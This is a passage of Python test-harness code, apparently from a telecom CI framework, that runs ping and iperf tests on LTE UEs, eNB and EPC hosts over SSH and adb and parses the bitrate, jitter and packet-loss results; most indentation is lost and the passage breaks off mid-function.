def Ping(self):
result = re.search('noS1', str(self.Initialize_eNB_args))
if result is not None:
self.PingNoS1()
return
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
check_OAI_UE = True
else:
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ueIpStatus = self.GetAllUEIPAddresses()
if (ueIpStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', UE_IP_ADDRESS_ISSUE)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
i = 0
lock = Lock()
status_queue = SimpleQueue()
for UE_IPAddress in self.UEIPAddresses:
device_id = self.UEDevices[i]
p = Process(target = self.Ping_common, args = (lock,UE_IPAddress,device_id,status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
i = i + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow(self.ping_args, 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
else:
ping_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
ping_status = False
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (ping_status):
self.CreateHtmlTestRowQueue(self.ping_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def Iperf_ComputeTime(self):
result = re.search('-t (?P<iperf_time>\d+)', str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Iperf time Not Found! \u001B[0m')
sys.exit(1)
return result.group('iperf_time')
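# Rescale the requested '-b' bandwidth according to the iperf profile:
# 'balanced' splits it evenly across UEs, 'single-ue' keeps it unchanged, and
# 'unbalanced' gives the first UE everything minus a 2% residual left to each other UE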
def Iperf_ComputeModifiedBW(self, idx, ue_num):
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Iperf bandwidth Not Found! \u001B[0m')
sys.exit(1)
iperf_bandwidth = result.group('iperf_bandwidth')
if self.iperf_profile == 'balanced':
iperf_bandwidth_new = float(iperf_bandwidth)/ue_num
if self.iperf_profile == 'single-ue':
iperf_bandwidth_new = float(iperf_bandwidth)
if self.iperf_profile == 'unbalanced':
# residual is 2% of max bw
residualBW = float(iperf_bandwidth) / 50
if idx == 0:
iperf_bandwidth_new = float(iperf_bandwidth) - ((ue_num - 1) * residualBW)
else:
iperf_bandwidth_new = residualBW
iperf_bandwidth_str = '-b ' + iperf_bandwidth
iperf_bandwidth_str_new = '-b ' + ('%.2f' % iperf_bandwidth_new)
result = re.sub(iperf_bandwidth_str, iperf_bandwidth_str_new, str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Calculate Iperf bandwidth Failed! \u001B[0m')
sys.exit(1)
return result
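# Parse the TCP iperf log through the tcp_iperf_stats.awk helper and report
# average/max/min bitrates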
def Iperf_analyzeV2TCPOutput(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
self.command('awk -f /tmp/tcp_iperf_stats.awk /tmp/CI-eNB/scripts/iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('Avg Bitrate : (?P<average>[0-9\.]+ Mbits\/sec) Max Bitrate : (?P<maximum>[0-9\.]+ Mbits\/sec) Min Bitrate : (?P<minimum>[0-9\.]+ Mbits\/sec)', str(self.ssh.before))
if result is not None:
avgbitrate = result.group('average')
maxbitrate = result.group('maximum')
minbitrate = result.group('minimum')
lock.acquire()
logging.debug('\u001B[1;37;44m TCP iperf result (' + UE_IPAddress + ') \u001B[0m')
msg = 'TCP Stats :\n'
if avgbitrate is not None:
logging.debug('\u001B[1;34m Avg Bitrate : ' + avgbitrate + '\u001B[0m')
msg += 'Avg Bitrate : ' + avgbitrate + '\n'
if maxbitrate is not None:
logging.debug('\u001B[1;34m Max Bitrate : ' + maxbitrate + '\u001B[0m')
msg += 'Max Bitrate : ' + maxbitrate + '\n'
if minbitrate is not None:
logging.debug('\u001B[1;34m Min Bitrate : ' + minbitrate + '\u001B[0m')
msg += 'Min Bitrate : ' + minbitrate + '\n'
statusQueue.put(0)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
return 0
def Iperf_analyzeV2Output(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
result = re.search('-u', str(iperf_real_options))
if result is None:
return self.Iperf_analyzeV2TCPOutput(lock, UE_IPAddress, device_id, statusQueue, iperf_real_options)
result = re.search('Server Report:', str(self.ssh.before))
if result is None:
result = re.search('read failed: Connection refused', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1;37;41m Could not connect to iperf server! \u001B[0m')
else:
logging.debug('\u001B[1;37;41m Server Report and Connection refused Not Found! \u001B[0m')
return -1
# Computing the requested bandwidth as a float
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(iperf_real_options))
if result is not None:
req_bandwidth = result.group('iperf_bandwidth')
req_bw = float(req_bandwidth)
result = re.search('-b [0-9\.]+K', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Kbits/sec' % req_bw
req_bw = req_bw * 1000
result = re.search('-b [0-9\.]+M', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Mbits/sec' % req_bw
req_bw = req_bw * 1000000
result = re.search('-b [0-9\.]+G', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Gbits/sec' % req_bw
req_bw = req_bw * 1000000000
result = re.search('Server Report:\\\\r\\\\n(?:|\[ *\d+\].*) (?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?P<jitter>[0-9\.]+ ms) +(\d+\/..\d+) (\((?P<packetloss>[0-9\.]+)%\))', str(self.ssh.before))
if result is not None:
bitrate = result.group('bitrate')
packetloss = result.group('packetloss')
jitter = result.group('jitter')
lock.acquire()
logging.debug('\u001B[1;37;44m iperf result (' + UE_IPAddress + ') \u001B[0m')
iperfStatus = True
msg = 'Req Bitrate : ' + req_bandwidth + '\n'
logging.debug('\u001B[1;34m Req Bitrate : ' + req_bandwidth + '\u001B[0m')
if bitrate is not None:
msg += 'Bitrate : ' + bitrate + '\n'
logging.debug('\u001B[1;34m Bitrate : ' + bitrate + '\u001B[0m')
result = re.search('(?P<real_bw>[0-9\.]+) [KMG]bits/sec', str(bitrate))
if result is not None:
actual_bw = float(str(result.group('real_bw')))
result = re.search('[0-9\.]+ K', bitrate)
if result is not None:
actual_bw = actual_bw * 1000
result = re.search('[0-9\.]+ M', bitrate)
if result is not None:
actual_bw = actual_bw * 1000000
result = re.search('[0-9\.]+ G', bitrate)
if result is not None:
actual_bw = actual_bw * 1000000000
br_loss = 100 * actual_bw / req_bw
bitperf = '%.2f ' % br_loss
msg += 'Bitrate Perf: ' + bitperf + '%\n'
logging.debug('\u001B[1;34m Bitrate Perf: ' + bitperf + '%\u001B[0m')
if packetloss is not None:
msg += 'Packet Loss : ' + packetloss + '%\n'
logging.debug('\u001B[1;34m Packet Loss : ' + packetloss + '%\u001B[0m')
if float(packetloss) > float(self.iperf_packetloss_threshold):
msg += 'Packet Loss too high!\n'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
iperfStatus = False
if jitter is not None:
msg += 'Jitter : ' + jitter + '\n'
logging.debug('\u001B[1;34m Jitter : ' + jitter + '\u001B[0m')
if (iperfStatus):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
return 0
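# Analyze the server-side UDP iperf log: average the per-interval bitrate and
# jitter rows, accumulate lost/sent packet counts, and flag the run (queue
# status 1) when the achieved bitrate is below 90% of the requested one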
def Iperf_analyzeV2Server(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
if (not os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not analyze from server log')
return
# Computing the requested bandwidth as a float
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(iperf_real_options))
if result is None:
logging.debug('Iperf bandwidth Not Found!')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not compute Iperf bandwidth!')
return
else:
req_bandwidth = result.group('iperf_bandwidth')
req_bw = float(req_bandwidth)
result = re.search('-b [0-9\.]+K', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Kbits/sec' % req_bw
req_bw = req_bw * 1000
result = re.search('-b [0-9\.]+M', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Mbits/sec' % req_bw
req_bw = req_bw * 1000000
result = re.search('-b [0-9\.]+G', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Gbits/sec' % req_bw
req_bw = req_bw * 1000000000
server_file = open('iperf_server_' + self.testCase_id + '_' + device_id + '.log', 'r')
br_sum = 0.0
ji_sum = 0.0
pl_sum = 0
ps_sum = 0
row_idx = 0
for line in server_file.readlines():
result = re.search('(?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?P<jitter>[0-9\.]+ ms) +(?P<lostPack>[0-9]+)/ +(?P<sentPack>[0-9]+)', str(line))
if result is not None:
bitrate = result.group('bitrate')
jitter = result.group('jitter')
packetlost = result.group('lostPack')
packetsent = result.group('sentPack')
br = bitrate.split(' ')
ji = jitter.split(' ')
row_idx = row_idx + 1
curr_br = float(br[0])
pl_sum = pl_sum + int(packetlost)
ps_sum = ps_sum + int(packetsent)
if (br[1] == 'Kbits/sec'):
curr_br = curr_br * 1000
if (br[1] == 'Mbits/sec'):
curr_br = curr_br * 1000 * 1000
br_sum = curr_br + br_sum
ji_sum = float(ji[0]) + ji_sum
if (row_idx > 0):
br_sum = br_sum / row_idx
ji_sum = ji_sum / row_idx
br_loss = 100 * br_sum / req_bw
if (br_sum > 1000):
br_sum = br_sum / 1000
if (br_sum > 1000):
br_sum = br_sum / 1000
bitrate = '%.2f Mbits/sec' % br_sum
else:
bitrate = '%.2f Kbits/sec' % br_sum
else:
bitrate = '%.2f bits/sec' % br_sum
bitperf = '%.2f ' % br_loss
bitperf += '%'
jitter = '%.2f ms' % (ji_sum)
if (ps_sum > 0):
pl = float(100 * pl_sum / ps_sum)
packetloss = '%2.1f ' % (pl)
packetloss += '%'
else:
packetloss = 'unknown'
lock.acquire()
if (br_loss < 90):
statusQueue.put(1)
else:
statusQueue.put(0)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
req_msg = 'Req Bitrate : ' + req_bandwidth
bir_msg = 'Bitrate : ' + bitrate
brl_msg = 'Bitrate Perf: ' + bitperf
jit_msg = 'Jitter : ' + jitter
pal_msg = 'Packet Loss : ' + packetloss
statusQueue.put(req_msg + '\n' + bir_msg + '\n' + brl_msg + '\n' + jit_msg + '\n' + pal_msg + '\n')
logging.debug('\u001B[1;37;45m iperf result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;35m ' + req_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + bir_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + brl_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + jit_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + pal_msg + '\u001B[0m')
lock.release()
else:
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not analyze from server log')
server_file.close()
def Iperf_analyzeV3Output(self, lock, UE_IPAddress, device_id, statusQueue):
result = re.search('(?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?:|[0-9\.]+ ms +\d+\/\d+ \((?P<packetloss>[0-9\.]+)%\)) +(?:|receiver)\\\\r\\\\n(?:|\[ *\d+\] Sent \d+ datagrams)\\\\r\\\\niperf Done\.', str(self.ssh.before))
if result is None:
result = re.search('(?P<error>iperf: error - [a-zA-Z0-9 :]+)', str(self.ssh.before))
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
if result is not None:
logging.debug('\u001B[1;37;41m ' + result.group('error') + ' \u001B[0m')
statusQueue.put(result.group('error'))
else:
logging.debug('\u001B[1;37;41m Bitrate and/or Packet Loss Not Found! \u001B[0m')
statusQueue.put('Bitrate and/or Packet Loss Not Found!')
			lock.release()
			return
bitrate = result.group('bitrate')
packetloss = result.group('packetloss')
lock.acquire()
logging.debug('\u001B[1;37;44m iperf result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;34m Bitrate : ' + bitrate + '\u001B[0m')
msg = 'Bitrate : ' + bitrate + '\n'
iperfStatus = True
if packetloss is not None:
logging.debug('\u001B[1;34m Packet Loss : ' + packetloss + '%\u001B[0m')
msg += 'Packet Loss : ' + packetloss + '%\n'
if float(packetloss) > float(self.iperf_packetloss_threshold):
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
msg += 'Packet Loss too high!\n'
iperfStatus = False
if (iperfStatus):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
def Iperf_UL_common(self, lock, UE_IPAddress, device_id, idx, ue_num, statusQueue):
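		"""
		Run an uplink iperf test: the server runs on the EPC side (or on the
		local executor for OAI-Rel14-CUPS) and the client on the UE, using port
		5001 + idx so that several UEs can run in parallel.
		"""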
udpIperf = True
result = re.search('-u', str(self.iperf_args))
if result is None:
udpIperf = False
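		# Derive the EPC-side iperf address by assuming the gateway is the .1
		# host on the UE's subnet (overridden below for OAI-Rel14-CUPS).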
ipnumbers = UE_IPAddress.split('.')
if (len(ipnumbers) == 4):
ipnumbers[3] = '1'
EPC_Iperf_UE_IPAddress = ipnumbers[0] + '.' + ipnumbers[1] + '.' + ipnumbers[2] + '.' + ipnumbers[3]
		# Launch the iperf server on the EPC side (true for ltebox and old open-air-cn).
		# For OAI-Rel14-CUPS, we launch from the python executor and use its IP address as the iperf client address.
launchFromEpc = True
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
launchFromEpc = False
cmd = 'hostname -I'
ret = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, encoding='utf-8')
if ret.stdout is not None:
EPC_Iperf_UE_IPAddress = ret.stdout.strip()
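		# One iperf server instance per UE: offset the default iperf port (5001) by the UE index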
port = 5001 + idx
if launchFromEpc:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
if udpIperf:
self.command('echo $USER; nohup iperf -u -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.EPCUserName, 5)
else:
self.command('echo $USER; nohup iperf -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.EPCUserName, 5)
self.close()
else:
if udpIperf:
cmd = 'nohup iperf -u -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log 2>&1 &'
else:
cmd = 'nohup iperf -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log 2>&1 &'
logging.debug(cmd + '\n')
subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, encoding='utf-8')
time.sleep(0.5)
# Launch iperf client on UE
if (device_id == 'OAI-UE'):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
else:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
iperf_time = self.Iperf_ComputeTime()
time.sleep(0.5)
if udpIperf:
modified_options = self.Iperf_ComputeModifiedBW(idx, ue_num)
else:
modified_options = str(self.iperf_args)
modified_options = modified_options.replace('-R','')
time.sleep(0.5)
self.command('rm -f iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
if (device_id == 'OAI-UE'):
iperf_status = self.command('iperf -c ' + EPC_Iperf_UE_IPAddress + ' ' + modified_options + ' -p ' + str(port) + ' -B ' + UE_IPAddress + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
else:
iperf_status = self.command('stdbuf -o0 adb -s ' + device_id + ' shell "/data/local/tmp/iperf -c ' + EPC_Iperf_UE_IPAddress + ' ' + modified_options + ' -p ' + str(port) + '" 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
# TIMEOUT Case
		if iperf_status < 0:
			self.close()
			message = 'iperf on UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT!'
			logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
			self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
			return
clientStatus = self.Iperf_analyzeV2Output(lock, UE_IPAddress, device_id, statusQueue, modified_options)
self.close()
# Kill iperf server on EPC side
if launchFromEpc:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('killall --signal SIGKILL iperf', self.EPCUserName, 5)
self.close()
else:
cmd = 'killall --signal SIGKILL iperf'
logging.debug(cmd + '\n')
subprocess.run(cmd, shell=True)
time.sleep(1)
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_server_' + self.testCase_id + '_' + device_id + '.log', self.EPCSourceCodePath + '/scripts')
# in case of failure, retrieve server log
if (clientStatus == -1):
if launchFromEpc:
time.sleep(1)
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '_' + device_id + '.log')
self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, self.EPCSourceCodePath + '/scripts/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.Iperf_analyzeV2Server(lock, UE_IPAddress, device_id, statusQueue, modified_options)
# in case of OAI-UE
if (device_id == 'OAI-UE'):
self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_' + self.testCase_id + '_' + device_id + '.log', '.')
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_' + self.testCase_id + '_' + device_id + '.log', self.EPCSourceCodePath + '/scripts')
def Iperf_common(self, lock, UE_IPAddress, device_id, idx, ue_num, statusQueue):
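		"""
		Per-UE worker for the Iperf test case (run in a separate process).
		Detects whether iperf or iperf3 is available on the UE, delegates '-R'
		(uplink) runs to Iperf_UL_common, otherwise starts the iperf server on
		the UE and the client on the EPC side (or the local executor for
		OAI-Rel14-CUPS), then analyzes the client log and, on failure, the
		server log.
		"""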
try:
# Single-UE profile -- iperf only on one UE
if self.iperf_profile == 'single-ue' and idx != 0:
return
useIperf3 = False
udpIperf = True
if (device_id != 'OAI-UE'):
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# if by chance ADB server and EPC are on the same remote host, at least log collection will take care of it
self.command('if [ ! -d ' + self.EPCSourceCodePath + '/scripts ]; then mkdir -p ' + self.EPCSourceCodePath + '/scripts ; fi', '\$', 5)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
# Checking if iperf / iperf3 are installed
if self.ADBCentralized:
self.command('adb -s ' + device_id + ' shell "ls /data/local/tmp"', '\$', 5)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "ls /data/local/tmp"\'', '\$', 60)
result = re.search('iperf3', str(self.ssh.before))
if result is None:
result = re.search('iperf', str(self.ssh.before))
if result is None:
message = 'Neither iperf nor iperf3 installed on UE!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
else:
useIperf3 = True
self.close()
# in case of iperf, UL has its own function
if (not useIperf3):
result = re.search('-R', str(self.iperf_args))
if result is not None:
self.Iperf_UL_common(lock, UE_IPAddress, device_id, idx, ue_num, statusQueue)
return
# Launch the IPERF server on the UE side for DL
if (device_id == 'OAI-UE'):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('-u', str(self.iperf_args))
if result is None:
self.command('echo $USER; nohup iperf -B ' + UE_IPAddress + ' -s -i 1 > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.UEUserName, 5)
udpIperf = False
else:
self.command('echo $USER; nohup iperf -B ' + UE_IPAddress + ' -u -s -i 1 > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.UEUserName, 5)
else:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
if self.ADBCentralized:
if (useIperf3):
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/iperf3 -s &', '\$', 5)
else:
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('-u', str(self.iperf_args))
if result is None:
self.command('echo $USER; nohup adb -s ' + device_id + ' shell "/data/local/tmp/iperf -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 5)
udpIperf = False
else:
self.command('echo $USER; nohup adb -s ' + device_id + ' shell "/data/local/tmp/iperf -u -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 5)
else:
self.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
self.command('echo $USER; nohup ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "/data/local/tmp/iperf -u -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &\' > /dev/null 2>&1', self.ADBUserName, 60)
time.sleep(0.5)
self.close()
			# Launch the iperf client on the EPC side for DL (true for ltebox and old open-air-cn).
			# For OAI-Rel14-CUPS, we launch from the python executor.
launchFromEpc = True
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
launchFromEpc = False
if launchFromEpc:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
iperf_time = self.Iperf_ComputeTime()
time.sleep(0.5)
if udpIperf:
modified_options = self.Iperf_ComputeModifiedBW(idx, ue_num)
else:
modified_options = str(self.iperf_args)
time.sleep(0.5)
if launchFromEpc:
self.command('rm -f iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
else:
if (os.path.isfile('iperf_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_' + self.testCase_id + '_' + device_id + '.log')
if (useIperf3):
self.command('stdbuf -o0 iperf3 -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
clientStatus = 0
self.Iperf_analyzeV3Output(lock, UE_IPAddress, device_id, statusQueue)
else:
if launchFromEpc:
iperf_status = self.command('stdbuf -o0 iperf -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
else:
					# redirect both stdout and stderr into the log file
					cmd = 'iperf -c ' + UE_IPAddress + ' ' + modified_options + ' > iperf_' + self.testCase_id + '_' + device_id + '.log 2>&1'
					logging.debug(cmd)
					ret = subprocess.run(cmd, shell=True)
iperf_status = ret.returncode
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_' + self.testCase_id + '_' + device_id + '.log', self.EPCSourceCodePath + '/scripts')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cat ' + self.EPCSourceCodePath + '/scripts/iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
if iperf_status < 0:
if launchFromEpc:
self.close()
					message = 'iperf on UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
clientStatus = self.Iperf_analyzeV2Output(lock, UE_IPAddress, device_id, statusQueue, modified_options)
self.close()
# Kill the IPERF server that runs in background
if (device_id == 'OAI-UE'):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('killall iperf', '\$', 5)
else:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell ps | grep --color=never iperf | grep -v grep', '\$', 5)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "ps" | grep --color=never iperf | grep -v grep\'', '\$', 60)
result = re.search('shell +(?P<pid>\d+)', str(self.ssh.before))
if result is not None:
pid_iperf = result.group('pid')
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell kill -KILL ' + pid_iperf, '\$', 5)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "kill -KILL ' + pid_iperf + '"\'', '\$', 60)
self.close()
# if the client report is absent, try to analyze the server log file
if (clientStatus == -1):
time.sleep(1)
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '_' + device_id + '.log')
if (device_id == 'OAI-UE'):
self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
else:
self.copyin(self.ADBIPAddress, self.ADBUserName, self.ADBPassword, self.EPCSourceCodePath + '/scripts/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.Iperf_analyzeV2Server(lock, UE_IPAddress, device_id, statusQueue, modified_options)
# in case of OAI UE:
if (device_id == 'OAI-UE'):
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
if not launchFromEpc:
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_server_' + self.testCase_id + '_' + device_id + '.log', self.EPCSourceCodePath + '/scripts')
else:
self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_server_' + self.testCase_id + '_' + device_id + '.log', self.EPCSourceCodePath + '/scripts')
except:
os.kill(os.getppid(),signal.SIGUSR1)
def IperfNoS1(self):
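		"""
		Iperf variant for the noS1 setup: traffic runs directly between the eNB
		and OAI UE hosts, with the '-R' option selecting which side hosts the
		iperf server.
		"""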
if self.eNBIPAddress == '' or self.eNBUserName == '' or self.eNBPassword == '' or self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = True
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.iperf_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
server_on_enb = re.search('-R', str(self.iperf_args))
if server_on_enb is not None:
iServerIPAddr = self.eNBIPAddress
iServerUser = self.eNBUserName
iServerPasswd = self.eNBPassword
iClientIPAddr = self.UEIPAddress
iClientUser = self.UEUserName
iClientPasswd = self.UEPassword
else:
iServerIPAddr = self.UEIPAddress
iServerUser = self.UEUserName
iServerPasswd = self.UEPassword
iClientIPAddr = self.eNBIPAddress
iClientUser = self.eNBUserName
iClientPasswd = self.eNBPassword
if self.iperf_options != 'sink':
# Starting the iperf server
self.open(iServerIPAddr, iServerUser, iServerPasswd)
# args SHALL be "-c client -u any"
# -c 10.0.1.2 -u -b 1M -t 30 -i 1 -fm -B 10.0.1.1
# -B 10.0.1.1 -u -s -i 1 -fm
server_options = re.sub('-u.*$', '-u -s -i 1 -fm', str(self.iperf_args))
server_options = server_options.replace('-c','-B')
self.command('rm -f /tmp/tmp_iperf_server_' + self.testCase_id + '.log', '\$', 5)
self.command('echo $USER; nohup iperf ' + server_options + ' > /tmp/tmp_iperf_server_' + self.testCase_id + '.log 2>&1 &', iServerUser, 5)
time.sleep(0.5)
self.close()
# Starting the iperf client
modified_options = self.Iperf_ComputeModifiedBW(0, 1)
modified_options = modified_options.replace('-R','')
iperf_time = self.Iperf_ComputeTime()
self.open(iClientIPAddr, iClientUser, iClientPasswd)
self.command('rm -f /tmp/tmp_iperf_' + self.testCase_id + '.log', '\$', 5)
iperf_status = self.command('stdbuf -o0 iperf ' + modified_options + ' 2>&1 | stdbuf -o0 tee /tmp/tmp_iperf_' + self.testCase_id + '.log', '\$', int(iperf_time)*5.0)
status_queue = SimpleQueue()
